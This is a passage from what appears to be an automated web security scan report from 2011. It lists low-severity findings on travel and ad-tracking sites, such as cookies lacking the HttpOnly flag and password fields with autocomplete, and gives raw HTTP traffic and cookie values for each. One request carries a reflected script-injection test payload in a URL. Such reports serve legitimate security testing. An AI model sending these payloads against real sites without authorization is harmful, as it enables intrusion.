Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621533; expires=Tue, 02-Oct-2012 00:58:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:53 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
14.291. http://www.sabretravelnetwork.com/images/home-text.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/home-text.png HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:07:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618474; expires=Tue, 02-Oct-2012 00:07:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:07:55 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
14.292. http://www.wtp101.com/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /f

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=675&e=1 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:22 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
14.293. http://www.wtp101.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1762 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:58:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Set-Cookie: s=!1762!2445!1731; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
14.294. http://www.wtp101.com/pull_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:54:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

14.295. http://www.wtp101.com/push_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /push_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /push_sync HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
14.296. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");
15. Password field with autocomplete enabled  previous  next
There are 20 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

15.1. http://www.booking.com/general.en-us.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /general.en-us.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/about HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.6.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=5.31764388084412

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:31:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YUFsPGDw%2F3YvsmbEMnpK9%2F5N%2B025mTgFVBfR64%2FgKzgcZwS2BG%2FpVqxxgeiiGa2Aij6eAdFCIoFktHJRCU7t6pG8eYurfp1mo97MaE6Xt3SQiUpot4wcm%2Ful3h2cCp3Aq3v9fFndje7J5kBuXpqwKFwzq1d8NFsqOMXkMLOh8MheA4SvhsDED1JW8Lzq1pPPuNWkLtLa2nYu4GrPir7OHtXIl44wyZZqW%2BoUI25Qt%2Bq%2FThnN11dNMvpllwZf%2BFUGaF0yEYQWfEUxqgLGBTcGCbPL2PoJSvzs3aJcz6peq6OJcz0X3v8XJzxlrl3Re%2B4fMPNVGOKw3OXRjD9BApu3kdB%2B4DfNedCdH7nvJIk8bHMsdAXvWaipTAaEEr77iSzcDzu0k4Pb0VGYDgJMguGhKAboI9qdT5%2FfoxQD1ZO10v0YKUwppRIyD0a3Ln9PUrxwZkhSSkHFlrAVjent8lv1qDG2xdp9lmPdV5vh3rRmuN1Lz0QN%2F3V2Sn9fPeJsHrK0pcgOYpSyW0n95GoFoyAkBhI17Phwo7yrvrjeDNHmxKMRkraR5MdqFJBuwCVd9dBvXoVyxW413W13jwOQsaHZx8iPdphluzMD5h3jwOEjlDkBpFkAF0kJZnoHDtUP3l1iRU%2FdEKfImnJ%2FQISsSKIW2wR5lSf%2F1SximqCADYBfEBvNs%2Bb4p%2BXQ0a42SQI1HuZMn7XZ3eadU1vaR0aacQEhT%2BTMbKt5QCA48TalbFf5k5egYBg9r%2B4N8uoiUgQQYx%2Ftt5AO9%2FVBRh7aJptr3L4saF02KTAh9Z0p5%2Fihhjlsn4hE28vhAsssqhO3O8S8giS%2BAD9yLu1raMti3QMcj0gfOfbUXo26HhPHD3cS56Ly4PlQzJm6UrwqCaLpO7KTYRTBFNfjq%2FicOkR6pMNZ1%2FC%2Fc0eZGJAjprFnEfcz%2Ff1D2udPGhpbVYLpVeRCyKbNt53ggYIGQr1TTkJ7xhSCCOCzTUXuE6dUGpUiWBZ7%2F3AHIMw6FvtaQBTat%2FQXE6ame41kAL%2B6V00yN0Xmopzv5yDpjigEcOO5oIMkGwsHdniwwtzhwSITaOyh2%2FKP0tbPU%2FCeKxA16ayEzJ5YKOenV4WVCjaYstXg3Le9A%2B%2BgxuR7X2ojY6dDXatodt%2F5RDf3maagBIdR6Oc6ZIKCZVYQTZjElDDZ8cp%2FgiTlLo6jDqUUyssnkr6X3M%2FAjD%2BrZNH8IuQKQM72Zu1cjPHJxdgPqO%2BOs%2F7rRh9o%2FTf5CKOGhXuc0PdC22WNwtICZpDHs8KyH%2F%2FopDWQBPuGzYzztul5MGNxkOl4zCU0jr3252eba8xA1Mw3aePG1Sf%2F8UQEgao7bg13Co2dpibytVWXIz1SXqF3vHV2vONIMhbOr0HejT8ddOxSgNDag0VIm1OAYgAbMxdRRA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:31:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 59658
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<div id="loginPopup">


<form name="loginform" class="stay_login" action="https://secure.booking.com/login.html?tmpl=profile/slogin&amp;protocol=http" id="login-form" method="POST" target="log_tar">
<div id="login_loading">
...[SNIP]...
</label>
<input type="password" id="password_input" class="input_pwd inputText" name="password" value="" tabindex="772">
<p class="forgotten">
...[SNIP]...
15.2. http://www.booking.com/hotel/us/c-boston-massachusettes.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKz